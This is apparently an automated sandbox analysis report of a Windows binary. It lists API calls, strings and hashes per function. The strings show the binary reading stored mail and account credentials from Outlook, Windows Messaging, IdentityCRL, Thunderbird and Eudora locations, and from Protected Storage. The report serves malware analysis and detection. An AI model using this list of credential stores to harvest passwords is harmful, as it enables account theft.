                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                      Similarity
                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                      • String ID: MS Sans Serif
                      Similarity
                      • API ID: ClassName_wcsicmpmemset
                      • String ID: edit
                      APIs
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                      • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                      Similarity
                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                      • String ID: SHAutoComplete$shlwapi.dll
                      Similarity
                      • API ID: memcpy$memcmp
                      Similarity
                      • API ID: memset$memcpy
                      APIs
                        • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                        • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                        • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                      • GetMenu.USER32(?), ref: 00410F8D
                      • GetSubMenu.USER32(00000000), ref: 00410F9A
                      • GetSubMenu.USER32(00000000), ref: 00410F9D
                      • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                      Similarity
                      • API ID: Menu$ItemMessageSend$CheckEnableRadio
                      APIs
                      • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                      • GetLastError.KERNEL32 ref: 0041810A
                      • CloseHandle.KERNEL32(00000000), ref: 00418120
                      Similarity
                      • API ID: File$CloseCreateErrorHandleLastMappingView
                      APIs
                        • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                      • memcpy.MSVCRT ref: 0042EC7A
                      Strings
                      • Cannot add a column to a view, xrefs: 0042EBE8
                      • virtual tables may not be altered, xrefs: 0042EBD2
                      • sqlite_altertab_%s, xrefs: 0042EC4C
                      Similarity
                      • API ID: memcpymemset
                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                      APIs
                      • memset.MSVCRT ref: 0040560C
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                      Similarity
                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                      • String ID: *.*$dat$wand.dat
                      APIs
                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                      • wcslen.MSVCRT ref: 00410C74
                      • _wtoi.MSVCRT ref: 00410C80
                      • _wcsicmp.MSVCRT ref: 00410CCE
                      • _wcsicmp.MSVCRT ref: 00410CDF
                      Similarity
                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                      APIs
                      • memset.MSVCRT ref: 00412057
                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                      • GetKeyState.USER32(00000010), ref: 0041210D
                      Similarity
                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                      APIs
                      • wcslen.MSVCRT ref: 0040A8E2
                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                        • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                        • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                      • memcpy.MSVCRT ref: 0040A94F
                      Similarity
                      • API ID: ??3@$memcpy$mallocwcslen
                      APIs
                      • wcslen.MSVCRT ref: 0040B1DE
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                        • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                        • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                      • memcpy.MSVCRT ref: 0040B248
                      Similarity
                      • API ID: ??3@$memcpy$mallocwcslen
                      Similarity
                      • API ID: memcpy
                      • String ID: @
                      Similarity
                      • API ID: ??2@??3@memcpymemset
                      APIs
                      • strlen.MSVCRT ref: 0040B0D8
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                        • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                        • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                      • memcpy.MSVCRT ref: 0040B159
                      Similarity
                      • API ID: ??3@$memcpy$mallocstrlen
                      APIs
                      • memset.MSVCRT ref: 004144E7
                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                        • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                      • memset.MSVCRT ref: 0041451A
                      • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                      Similarity
                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                      Similarity
                      • API ID: memcpy$memset
                      • String ID: sqlite_master
                      APIs
                      • SHGetMalloc.SHELL32(?), ref: 00414D9A
                      • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                      • wcscpy.MSVCRT ref: 00414DF3
                      Similarity
                      • API ID: BrowseFolderFromListMallocPathwcscpy
                      APIs
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                      • _snwprintf.MSVCRT ref: 00410FE1
                      • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                      • _snwprintf.MSVCRT ref: 0041100C
                      • wcscat.MSVCRT ref: 0041101F
                      Similarity
                      • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                      • String ID:
                      APIs
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,771ADF80,?,0041755F,?), ref: 00417452
                      • malloc.MSVCRT ref: 00417459
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,771ADF80,?,0041755F,?), ref: 00417478
                      • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                      Similarity
                      • API ID: ByteCharMultiWide$??3@malloc
                      • String ID:
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                      • RegisterClassW.USER32(?), ref: 00412428
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                      Similarity
                      • API ID: HandleModule$ClassCreateRegisterWindow
                      • String ID:
                      APIs
                      • GetDlgItem.USER32(?,?), ref: 00409B40
                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                      Similarity
                      • API ID: MessageSend$Item
                      • String ID:
                      APIs
                      • memset.MSVCRT ref: 00417B7B
                      • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                      • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                      • GetLastError.KERNEL32 ref: 00417BB5
                      Similarity
                      • API ID: File$ErrorLastLockUnlockmemset
                      • String ID:
                      APIs
                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                      • malloc.MSVCRT ref: 00417407
                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                      • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                      Similarity
                      • API ID: ByteCharMultiWide$??3@malloc
                      • String ID:
                      APIs
                      • memset.MSVCRT ref: 0040F673
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                      • strlen.MSVCRT ref: 0040F6A2
                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                      Similarity
                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                      • String ID:
                      APIs
                      • memset.MSVCRT ref: 0040F6E2
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                      • strlen.MSVCRT ref: 0040F70D
                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                      Similarity
                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                      • String ID:
                      APIs
                      • memset.MSVCRT ref: 00402FD7
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                      • strlen.MSVCRT ref: 00403006
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                      Similarity
                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                      • String ID:
                      APIs
                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                      • GetStockObject.GDI32(00000000), ref: 004143C6
                      Similarity
                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                      • String ID:
                      APIs
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                      Similarity
                      • API ID: Time$System$File$LocalSpecific
                      • String ID:
                      APIs
                      • memcpy.MSVCRT ref: 004134E0
                      • memcpy.MSVCRT ref: 004134F2
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                      Similarity
                      • API ID: memcpy$DialogHandleModuleParam
                      • String ID:
                      APIs
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      APIs
                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                      Strings
                      Similarity
                      • API ID: InvalidateMessageRectSend
                      • String ID: d=E
                      APIs
                      • wcschr.MSVCRT ref: 0040F79E
                      • wcschr.MSVCRT ref: 0040F7AC
                        • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                        • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                      Strings
                      Similarity
                      • API ID: wcschr$memcpywcslen
                      • String ID: "
                      APIs
                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                      • _memicmp.MSVCRT ref: 0040C00D
                      • memcpy.MSVCRT ref: 0040C024
                      Strings
                      Similarity
                      • API ID: FilePointer_memicmpmemcpy
                      • String ID: URL
                      APIs
                      Strings
                      Similarity
                      • API ID: _snwprintfmemcpy
                      • String ID: %2.2X
                      APIs
                      Strings
                      Similarity
                      • API ID: _snwprintf
                      • String ID: %%-%d.%ds
                      APIs
                      • memset.MSVCRT ref: 0040E770
                      • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                      Strings
                      Similarity
                      • API ID: MessageSendmemset
                      • String ID: F^@
                      APIs
                      Strings
                      Similarity
                      • API ID: PlacementWindowmemset
                      • String ID: WinPos
                      APIs
                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                      • wcsrchr.MSVCRT ref: 0040DCE9
                      • wcscat.MSVCRT ref: 0040DCFF
                      Strings
                      Similarity
                      • API ID: FileModuleNamewcscatwcsrchr
                      • String ID: _lng.ini
                      APIs
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                      Strings
                      Similarity
                      • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                      APIs
                      Similarity
                      • API ID: memcpy$memset
                      • String ID:
                      APIs
                      Similarity
                      • API ID: ??2@$memset
                      • String ID:
                      APIs
                      • memcmp.MSVCRT ref: 00408AF3
                        • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                        • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                        • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                      • memcmp.MSVCRT ref: 00408B2B
                      • memcmp.MSVCRT ref: 00408B5C
                      • memcpy.MSVCRT ref: 00408B79
                      Similarity
                      • API ID: memcmp$memcpy
                      • String ID:
                      APIs
                      Similarity
                      • API ID: wcslen$wcscat$wcscpy
                      • String ID:

                      Execution Graph

                      Execution Coverage: 2.4%
                      Dynamic/Decrypted Code Coverage: 20.4%
                      Signature Coverage: 0.5%
                      Total number of Nodes: 849
                      Total number of Limit Nodes: 16

                      Control-flow Graph

                      APIs
                      • memset.MSVCRT ref: 0040832F
                      • memset.MSVCRT ref: 00408343
                      • memset.MSVCRT ref: 0040835F
                      • memset.MSVCRT ref: 00408376
                      • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                      • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                      • strlen.MSVCRT ref: 004083E9
                      • strlen.MSVCRT ref: 004083F8
                      • memcpy.MSVCRT ref: 0040840A
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                      • String ID: 5$H$O$b$i$}$}
                      • API String ID: 1832431107-3760989150
                      • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                      • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                      • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                      • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                      APIs
                      • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                      • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                      • strlen.MSVCRT ref: 00407F5C
                      • strlen.MSVCRT ref: 00407F64
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: FileFindstrlen$FirstNext
                      • String ID: ACD
                      • API String ID: 379999529-620537770
                      • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                      • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                      • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                      • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                      Control-flow Graph

                      APIs
                      • memset.MSVCRT ref: 00401E8B
                      • strlen.MSVCRT ref: 00401EA4
                      • strlen.MSVCRT ref: 00401EB2
                      • strlen.MSVCRT ref: 00401EF8
                      • strlen.MSVCRT ref: 00401F06
                      • memset.MSVCRT ref: 00401FB1
                      • atoi.MSVCRT ref: 00401FE0
                      • memset.MSVCRT ref: 00402003
                      • sprintf.MSVCRT ref: 00402030
                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                      • memset.MSVCRT ref: 00402086
                      • memset.MSVCRT ref: 0040209B
                      • strlen.MSVCRT ref: 004020A1
                      • strlen.MSVCRT ref: 004020AF
                      • strlen.MSVCRT ref: 004020E2
                      • strlen.MSVCRT ref: 004020F0
                      • memset.MSVCRT ref: 00402018
                        • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                      • _mbscpy.MSVCRT ref: 00402177
                      • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                      • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                      • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                      • API String ID: 1846531875-4223776976
                      • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                      • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                      • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                      • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                        • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                        • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                        • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                      • DeleteObject.GDI32(?), ref: 0040D1A6
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                      • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                      • API String ID: 745651260-375988210
                      • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                      • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                      • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                      • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                      Control-flow Graph

                      APIs
                        • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                      • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                      • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                      • _mbscpy.MSVCRT ref: 00403E54
                      Strings
                      • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                      • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                      • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                      • pstorec.dll, xrefs: 00403C30
                      • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                      • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                      • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                      • PStoreCreateInstance, xrefs: 00403C44
                      • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                      • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                      • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Library$AddressFreeLoadProc_mbscpy
                      • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                      • API String ID: 1197458902-317895162
                      • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                      • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                      • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                      • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                      Control-flow Graph
                      • Graph 231 (legend and node/edge list omitted): entry block 00444C4A-00444C66 calls GetModuleHandleA; later blocks call __set_app_type, __p__fmode, __p__commode, __setusermatherr, _initterm, __getmainargs, _initterm, GetStartupInfoA and GetModuleHandleA, then _cexit or exit (the MSVCRT entry-point sequence).
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                      • String ID: k{v
                      • API String ID: 3662548030-443568515
                      • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                      • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                      • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                      • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                      Control-flow Graph
                      • Graph 269 (legend and node/edge list omitted): entry block 0040FB00-0040FB35 calls RegOpenKeyExA; later blocks call RegOpenKeyExA, RegQueryValueExA, memcpy ×2, LocalFree and RegCloseKey ×2.
                      APIs
                      • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                      • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                      • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                      • memcpy.MSVCRT ref: 0040FBE4
                      • memcpy.MSVCRT ref: 0040FBF9
                        • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                        • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                        • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                        • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                      • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                      • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
